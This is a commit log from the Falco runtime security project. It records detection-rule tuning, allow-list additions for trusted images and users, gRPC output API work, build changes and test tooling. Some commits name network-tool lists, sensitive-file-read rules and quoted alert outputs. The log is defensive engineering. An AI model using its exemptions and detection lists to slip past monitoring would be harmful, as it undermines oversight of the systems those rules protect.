Compare commits

...

185 Commits

Author SHA1 Message Date
kaizhe
511ef52717 rule (EphemeralContainers Created): add new rule to detect ephemeral container created
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-08-06 22:42:18 +02:00
kaizhe
e2bf87d207 macro(trusted_pod): add new list k8s_image_list
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-31 10:40:48 +02:00
Antoine Deschênes
0a600253ac falco-driver-loader: fix conflicting $1 argument usage
Signed-off-by: Antoine Deschênes <antoine@antoinedeschenes.com>
2020-07-28 09:58:39 +02:00
kaizhe
571f8a28e7 add macro user_read_sensitive_file_containers
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-25 08:53:06 +02:00
kaizhe
6bb0bba68a rules update(Read sensitive file untrusted): add trusted images into whitelist
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-25 08:53:06 +02:00
Leonardo Grasso
f1a42cf259 rule(list allowed_k8s_users): add "kubernetes-admin" user
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-25 08:51:13 +02:00
Nicolas Vanheuverzwijn
427c15f257 rule(macro falco_privileged_images): add 'docker.io/falcosecurity/falco'
Add 'docker.io/falcosecurity/falco' image to  'falco_privileged_images' macro. This preven messages like this when booting up falco :

```
Warning Pod started with privileged container (user=system:serviceaccount:kube-system:daemon-set-controller pod=falco-42brw ns=monitoring images=docker.io/falcosecurity/falco:0.24.0)
```

Signed-off-by: Nicolas Vanheuverzwijn <nicolas.vanheu@gmail.com>
2020-07-23 20:49:57 +02:00
kaizhe
a9b4e6c73e add sysdig/agent-slim to the user_trusted_images macro
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-20 23:41:47 +02:00
kaizhe
b32853798f rule update (macro: user_trusted_containers): add sysdig/node-image-analyzer to macro user_trusted_containers
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-20 23:41:47 +02:00
Shane Lawrence
b86bc4a857 Use ISO 8601 format for changelog dates.
Signed-off-by: Shane Lawrence <shane@lawrence.dev>
2020-07-20 23:25:30 +02:00
Leo Di Donato
23224355a5 docs(test): integration tests intended to be run against a release build of Falco
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>

Co-authored-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-20 22:48:00 +02:00
Leo Di Donato
84fbac0863 chore(.circleci): switch back to falcosecurity/falco-tester:latest runner for integration tests
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
3814b2e81b docs(test): run all the test suites at once
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
a83b91fc53 new(test): run_regression_tests.sh -h
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
e618f005b6 update(docker/tester): use the new run_regression_tests.sh CLI flags
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
d8faa95702 fix(test): run_regression_tests.sh must generate falco_traces test suite in a non-interactive way
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
ef5e71598a docs(test): instruction to run falco_tests_package integration test suite locally
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
bb1282c7be update(test): make run_regression_tests.sh script accept different
options

The following options have been added:
* -v (verbose)
* -p (prepare falco_traces test suite)
* -b (specify custom branch for downloading trace files)
* -d (specify the build directory)

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
8f07189ede docs(test): instructions for executing falco_traces integration test suite
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
dec2ff7d72 docs(test): prepare the local environment for running integration test suites
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
f3022e0abf build(test): target test-traces files
This make target calls the `trace-files-psp`, `trace-files-k8s-audit`,
`trace-files-base-scap` targets to place all the integration test
fixtures in the proper position.

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
9b42b20e1c build(test/trace_files): target trace-files-base-scap
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
850a49989f build(test/trace_files/psp): target trace-files-psp
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Di Donato
0dc2a6abd3 build(test/traces_file/k8s_audit): target trace-files-k8s-audit
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-20 22:48:00 +02:00
Leonardo Grasso
4346e98f20 feat(userspace/falco): print version at startup
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-16 22:35:56 +02:00
Lorenzo Fontana
38009f23b4 build: remove libyaml from cpack rpm
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-07-16 19:34:39 +02:00
Lorenzo Fontana
324a3b88e7 build: remove libyaml-0-2 as dependency in packages and dockerfiles
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-07-16 19:34:39 +02:00
Lorenzo Fontana
c03f563450 build: libyaml in bundled deps
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-07-16 19:34:39 +02:00
Leonardo Di Donato
c4b7f17271 docs: refinements to the release process docs
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-16 16:38:15 +02:00
Leonardo Di Donato
ebb0c47524 docs: 0.24.0 changelog entries
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-16 16:38:15 +02:00
Lorenzo Fontana
a447b6996e fix(userspace): rethrow inspector open exceptions
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <fontanalorenz@gmail.com>
2020-07-15 18:33:50 +02:00
Leonardo Di Donato
596e7ee303 fix(userspace/falco): try to insert kernel module driver conditionally
Do it only when not running with userspace instrumentation enabled and
the syscall input source is enabled (!disable_syscall)

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-15 18:33:50 +02:00
Leonardo Di Donato
8ae6aa51b9 chore: onetbb dependency is back
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-15 18:33:50 +02:00
Leo Di Donato
1343fd7e92 update(userspace/falco): userspace instrumentation help line
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-15 18:33:50 +02:00
Kris Nova
1954cf3af3 update(userspace/falco): edits to the falco CLI
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
Co-authored-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-15 18:33:50 +02:00
Kris Nova
bc8f9a5692 feat(cli): adding -u to the usage text
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-07-15 18:33:50 +02:00
Kris Nova
1af1226566 feat(build): fixing MD5 of tpp for udig/pdig build
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-07-15 18:33:50 +02:00
Loris Degioanni
c743f1eb68 feat(cli): adding -u to flip inspector method calls
udig support through the -u command line flag

Signed-off-by: Kris Nóva <kris@nivenly.com>
Co-authored-by: Kris Nóva <kris@nivenly.com>
2020-07-15 18:33:50 +02:00
Leonardo Grasso
bca98e0419 update(rules): disable drift detection rules by default
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-15 18:01:57 +02:00
Nicolas Marier
32bae35de2 rule(list package_mgmt_binaries): add snapd to list
Snap is a package manager by Canonical which was not in the
`package_mgmt_binaries` list.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-07-10 10:04:26 +02:00
Leonardo Grasso
de147447ed update(userspace/falco): rename --stats_interval to --stats-interval
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-08 17:55:16 +02:00
Leonardo Di Donato
825e249294 update(userspace/falco): rename --stats_interval to --stats-interval
To match the style of other long flags of the Falco CLI.

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-08 17:55:16 +02:00
Leonardo Di Donato
00689a5d97 fix(userspace/falco): allow stats interval greather than 999
milliseconds

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-08 17:55:16 +02:00
Leonardo Grasso
4d31784a83 fix(docker): correct syntax error in the entrypoint script
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-08 12:11:33 +02:00
Leonardo Di Donato
2848eceb03 build(cmake/modules): update driver version to 85c889
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 21:19:08 +02:00
Leonardo Di Donato
c7ac1ef61b update(userspace/engine): const correctness for json_event class
Co-authored-by: Nathan Baker <nathan.baker@sysdig.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 21:19:08 +02:00
Leonardo Di Donato
5fd3c38422 build(cmake/modules): update driver version to 33c00f
This driver version, among other things (like userspace instrumentation
support) includes a fix for building the eBPF driver on CentOS 8
machines too.

Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 18:41:01 +02:00
Leo Di Donato
3bad1d2a56 docs: auto threadiness comment into Falco config
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 13:42:09 +02:00
Leonardo Di Donato
8ad5c4f834 update: default grpc server threadiness is 0 now ("auto")
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 13:42:09 +02:00
Leonardo Di Donato
553856ad68 chore(userspace): log the gRPC threadiness
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 13:42:09 +02:00
Leonardo Di Donato
2d52be603d update(userspace/falco): gRPC server threadiness 0 by default (which
means "auto")

The 0 ("auto") value sets the threadiness to the number of online cores
automatically.

Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 13:42:09 +02:00
Leonardo Di Donato
75e62269c3 new: hardware_concurrency helper
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-07 13:42:09 +02:00
Lorenzo Fontana
3d1f27d082 build: stale bot adjustements
Removed not existing labels and made the error message a bit more
verbose to tell people what to expect next.

Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-07-07 12:20:55 +02:00
Leonardo Grasso
ad960a9485 chore(docker): rename SKIP_MODULE_LOAD to SKIP_DRIVER_LOADER
As per https://github.com/falcosecurity/falco/blob/master/proposals/20200506-artifacts-scope-part-2.md#action-items

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-07 12:17:20 +02:00
kaizhe
d8d218230d rules update: create placeholder macros for customization
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-07-03 20:54:36 +02:00
Leonardo Grasso
b7e7a10035 docs: add myself to owners
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-03 16:37:17 +02:00
Leonardo Grasso
fecf1a9fea fix(userspace/falco/lua): correct argument
This explain why `buffered_output: false` was not honored for stdout

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-07-03 11:45:00 +02:00
Leonardo Di Donato
54a6d5c523 build: do not download lyaml and lpeg from draios S3 anymore
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-02 06:01:12 +02:00
Leonardo Di Donato
9fe78bf658 build: fetch libb64 and luajit from github, not from draios repos
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-02 06:01:12 +02:00
Leonardo Di Donato
727755e276 build: fetch openssl, curl, njson dependencies from github not draios
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-07-02 06:01:12 +02:00
Lorenzo Fontana
352307431a fix: update k8s audit endpoint to /k8s-audit everywhere
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-07-01 13:29:51 +02:00
Leonardo Grasso
6cfb0ec2b8 update(test): setup bidi gRPC integration test
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-30 13:04:03 +02:00
Leonardo Grasso
4af769f84c new(test): add gRPC unix socket support
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-30 13:04:03 +02:00
Leonardo Grasso
82e0b5f217 fix(userspace/falco): honor -M also when using a trace file
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-30 13:04:03 +02:00
Leonardo Di Donato
b4d005eb51 new(test): read grpc config fields
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-30 13:04:03 +02:00
Leonardo Di Donato
061c5f5ac9 new(test): setup gRPC output test case
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-30 13:04:03 +02:00
Leonardo Di Donato
c06ccf8378 update(docker/tester): grpcurl
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-30 13:04:03 +02:00
samwhite-gl
3408ea9164 Add GitLab to ADOPTERS.md
GitLab is now using Falco to provide Container Host Security protection

Co-Authored-By: Kris Nova <kris@nivenly.com>
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-06-30 11:45:58 +02:00
samwhite-gl
51aea00be8 Add GitLab to ADOPTERS.md
GitLab is now using Falco to provide Container Host Security protection

Co-Authored-By: Kris Nova <kris@nivenly.com>
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-06-30 11:45:58 +02:00
Antoine Deschênes
a5cadbf5fa rule(Disallowed K8s User): whitelist kube-apiserver-healthcheck
kops 1.17 adds a kube-apiserver-healthcheck user: https://github.com/kubernetes/kops/tree/master/cmd/kube-apiserver-healthcheck

Logs are currently spammed with:
```
{"output":"18:02:15.466580992: Warning K8s Operation performed by user not in allowed list of users (user=kube-apiserver-healthcheck target=<NA>/<NA> verb=get uri=/healthz resp=200)","priority":"Warning","rule":"Disallowed K8s User","time":"2020-06-29T18:02:15.466580992Z", "output_fields": {"jevt.time":"18:02:15.466580992","ka.response.code":"200","ka.target.name":"<NA>","ka.target.resource":"<NA>","ka.uri":"/healthz","ka.user.name":"kube-apiserver-healthcheck","ka.verb":"get"}}
```

Signed-off-by: Antoine Deschênes <antoine.deschenes@equisoft.com>
2020-06-30 11:44:11 +02:00
Lorenzo Fontana
9eb0b7fb5f update(userspace/falco): avoid memory allocation for falco output
response

Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
869d883dc7 update(userspace/falco): better gRPC server logging
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
b88767f558 bc(userspace/falco): the Falco gRPC Outputs API are now "falco.outputs.service/get" and "falco.outputs.service/sub"
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
bdbdf7b830 update(userspace/falco): pluralize Falco output proto and service
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
4e2f3e2c71 update(proposals): keep Falco gRPC Outputs proposal in sync
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
3d9bc8f67b update(userspace/falco): remove keepalive from output request
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
c89c11c3c4 update(userspace/falco): remove output queue size
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
5bd9ba0529 update(userspace/falco/grpc): simpler bidirectional context state
transitions

Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
b9e6d65e69 update(userspace/falco/grpc): bidirectional sub implementation
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
0d194f2b40 update(userspace/falco/grpc): for stream contexts use a flag to detect
if it is still running or not

Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Lorenzo Fontana
d9f2cda8cf update(userspace/falco/grpc): dealing with multiple streaming requests
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
2ebc55f897 wip(userspace/falco): bidirectional gRPC outputs logic (initial)
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
01ae8701d9 new(userspace/falco): concrete initial implementation of the subscribe gRPC service
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
be6c4b273d new(userspace/falco): gRPC context for bidirectional services
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
a72f27c028 new(userspace/falco): macro to REGISTER_BIDI gRPC services
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
58adc5b60c new(userspace/falco): output gRPC service to provide a server streaming method and a bidirectional method to obtain Falco alerts
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
cf31712fad update(userspace/falco): context class for bidirectional gRPC services
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
a568c42adb update(userspace/falco): unsafe_size() method for falco::output::queue
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
Leonardo Di Donato
05dd170d70 fix(userspace/falco): virtual destructor of base grpc context
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-29 20:42:50 +02:00
kaizhe
e29a4c8560 rule(list network_tool_binaries): add zmap to the list
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-06-29 18:17:28 +02:00
Lorenzo Fontana
c5ba95deff docs: teal logo is svg
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-06-29 09:14:50 -07:00
Leonardo Grasso
27037e64cc chore(rules): remove redundant condition from root_dir macro
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-26 19:57:18 +02:00
Leonardo Grasso
1859552834 fix(rules): correct root_dir macro to avoid unwanted matching
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-26 19:57:18 +02:00
Nicolas Marier
298ba29c88 rule(Change thread namespace): whitelist protokube, dockerd, tini and aws
These application binaries raise events in the `Change thread namespace`
rule as part of their normal operation.

Here are more details regarding each binary :

- `protokube` : See [this](https://github.com/kubernetes/kops/tree/master/protokube)
- `dockerd` : The `dockerd` process name is whitelisted already in this
  rule, but not if it is the parent, which will happen if you are doing
  docker-in-docker.
- `tini` : See [this](https://github.com/krallin/tini)
- `aws` : This one I noticed because Falco itself uses the AWS CLI to
  send events to SNS, which was triggering this rule.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-06-24 11:02:12 +02:00
Nicolas Marier
0272b94bb1 rule(macro exe_running_docker_save): add new cmdline
While using Falco, I noticed we were getting many events that were
virtually identical to those that were previously filtered out by the
`exexe_running_docker_save` macro, but where the `cmdline` was something
like `exe /var/run/docker/netns/cc5c7b9bb110 all false`. I believe this
is caused by the use of docker-in-docker.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-06-24 11:02:12 +02:00
Nicolas Marier
dbd86234ad rule(macro user_expected_terminal_shell_in_container_conditions): create the macro
A macro like this is useful because configuration management software
may need to run containers with an attached terminal to perform some of
its duties, and users may want to ignore this behavior.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-06-23 21:53:41 +02:00
Nicolas Marier
b69bde6bd4 rule(macro user_known_write_below_binary_dir_activities): Create the macro
This macro is useful to allow binaries to be installed under certain
circumstances. For example, it may be fine to install a binary during a
build in a ci/cd pipeline.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-06-22 16:19:07 +02:00
Leonardo Di Donato
d2f0ad7c07 fix(rules): exclude runc writing /var/lib/docker for container drift
detected rules

Co-authored-by: Lorenzo Fontana <lo@linux.com>
Co-authored-by: Leonardo Grasso <me@leonardograsso.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-06-22 12:24:59 +02:00
Omer Azaria
70b9bfe1d6 rule(Container Drift Detected): detect new exec created in a container
Signed-off-by: Omer Azaria <omer.azaria@sysdig.com>
2020-06-22 12:24:59 +02:00
Dotan Horovits
17f6da7885 Add Logz.io to Falco's adopters list ADOPTERS.md (continuing commit #1235)
What type of PR is this?

Uncomment one (or more) /kind <> lines:

/kind bug

/kind cleanup

/kind design

/kind documentation

/kind failing-test

/kind feature

If contributing rules or changes to rules, please make sure to also uncomment one of the following line:

/kind rule-update

/kind rule-create

Any specific area of the project related to this PR?

Uncomment one (or more) /area <> lines:

/area build

/area engine

/area rules

/area tests

/area proposals

What this PR does / why we need it:
updating ADOPTERS.md with a new adopter details

Which issue(s) this PR fixes:

Fixes #

Special notes for your reviewer:
re-issuing the PR from #1235 (due to change of owner, per request by @leogr)

Does this PR introduce a user-facing change?:

NONE
/assign @leogr 

Signed-off-by: Dotan Horovits dotan.horovits@gmail.com
2020-06-19 15:37:55 +02:00
kaizhe
dee0cc67f3 rule update (Anonymous Request Allowed): update to checking auth decision equals to allow
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-06-19 15:32:58 +02:00
Leonardo Grasso
8429256e37 fix(falco.yaml): correct k8s audit endpoint
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-19 15:31:17 +02:00
Shane Lawrence
00884ef581 Log modified copy instead of original message.
Signed-off-by: Shane Lawrence <shane@lawrence.dev>
2020-06-19 15:28:42 +02:00
Leonardo Grasso
578ef7f64d rule(Create files below dev): correct condition to catch openat
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-10 12:21:36 +02:00
Leonardo Grasso
a5ce61f03f rule(macro bin_dir_rename): correct condition to catch all variants
Since `evt.arg[1]` does not work for all syscalls, switch to:
 - `evt.arg.path` for `rmdir` and `unlink` (used by `remove` macro)
 - `evt.arg.name` for `unlinkat` (used by `remove` macro)
 - `evt.arg.oldpath/newpath` for `rename` and `renameat` (used by `rename` macro)

That ensures `Modify binary dirs` works properly.

Note that we cannot yet use `renameat2` (not supported by sinsp, see https://github.com/draios/sysdig/issues/1603 )

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-10 12:21:36 +02:00
Leonardo Grasso
74ca02d199 rule(macro bin_dir_mkdir): correct condition to catch mkdirat case
Since the dir's path is found:
-  in `evt.arg[1]` for `mkdir`
-  but in `evt.arg[2]` for `mkdirat`
switch to `evt.arg.path` to catch both.
That ensures `Mkdir binary dirs` works properly.

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-06-10 12:21:36 +02:00
Leonardo Di Donato
3bfd94fefd docs(test): run locally handling python deps with venv
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-26 15:01:48 +02:00
Leonardo Di Donato
6eb9b1add1 build(test): requirements.txt
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-26 15:01:48 +02:00
Nicolas Marier
81e29c55ec rule(macro user_known_set_setuid_or_setgid_bit_conditions): create macro
This macro will be useful because it will make it possible to filter out
events with a higher degree of granularity than is currently possible
for the `Set Setuid or Setgid bit` rule.

For example, if some application is expected to set the setuid or the
setgid bit under a specific condition, like if it's started with a
specific command, then the `user_known_chmod_applications` list is not
enough because we don't want to filter out _all_ events by this
application, only specific ones. This macro allows that.

Signed-off-by: Nicolas Marier <nmarier@coveo.com>
2020-05-26 10:23:31 +02:00
Leonardo Di Donato
f186e5f41f fix(userspace/falco): set gpr log verbosity accordingly to the Falco one
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
ade64b0ce8 update(userspace/falco): make log level a configuration member
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
d808c0aeaf update(tests/engine): test is_unix_scheme
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
65e069a020 update(userspace/engine): url_is_unix_scheme() util is now is_unix_scheme(string_view)
Also no more custom `starts_with` utility function.

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
75c2275dac build(userspace): falco and falco_engine depend on string-view-lite header
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
258f73ede2 build: download string-view-lite
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Leonardo Di Donato
3386671452 build(cmake/modules): cmake module for string-view-lite
The CMake module downloads `string-view-lite` from
https://github.com/martinmoene/string-view-lite

It is a single-file header-only version of C++17-like `string_view` for
C++98, C++03, C++11, and later.

Notices it also provides C++20 extensions like:

- empty()
- starts_with()
- ends_with()
- etc.

Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
2680a459ec new(tests/engine): update socket path
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
da9278f061 docs: add grpc notice in falco.yaml
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
dc0670c718 update(userspace/falco): wrap gpr logs into falco logs
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
05ce5b7f0b new(tests): cases for falco::utils::starts_with
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
de8bade2bf update(userspace/engine): move utils inside engine
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
e245fe460f docs: update falco.yaml to explain how to use the unix socket feature
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
d7de45acb2 new(userspace/falco): gRPC server unix socket support
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Lorenzo Fontana
86b473e224 update(userspace/falco): utilities to detect unix socket prefix in string
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-21 18:15:46 +02:00
Mark Stemm
d1c9aae881 rule(list allowed_k8s_users): Add vertical pod autoscaler as known k8s users
https://github.com/kubernetes/autoscaler/tree/master/vertical-pod-autoscaler

Example alert:
---
K8s Operation performed by user not in allowed list of
users (user=vpa-recommender target=vpa-recommender/endpoints verb=update
uri=core/v1/namespaces/kube-system/endpoints/vpa-recommender resp=200)

K8s Operation performed by user not in allowed list of
users (user=vpa-updater target=vpa-updater/endpoints verb=update
uri=core/v1/namespaces/kube-system/endpoints/vpa-updater resp=200)
---

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-21 10:57:42 +02:00
Mark Stemm
986ea28279 rule(macro user_known_k8s_client_container): Allow hcp-tunnelfront torun kubectl in containers
https://stackoverflow.com/questions/50349586/what-is-hcp-tunnelfront

Example alert:

---
Docker or kubernetes client executed in container (user=root
parent=run-tunnel-fron cmdline=kubectl
--kubeconfig=/etc/kubernetes/kubeconfig/kubeconfig get secret
tunnelfront --namespace=kube-system --output json --ignore-not-found
image=mcr.microsoft.com/aks/hcp/hcp-tunnel-front)
---

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-21 10:57:42 +02:00
Mark Stemm
5266618689 rule(macro lvprogs_writing_conf): Add lvs as a lvm program
Example event. I'm pretty sure the full file in this case is /etc/lvm/cache:

---
File below /etc opened for writing (user=root command=lvs --noheadings
--readonly --separator=";" -a -o
lv_tags,lv_path,lv_name,vg_name,lv_uuid,lv_size parent=ceph-volume
pcmdline=ceph-volume /usr/sbin/ceph-volume inventory --format json file=/etc/lvm/c...
---

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
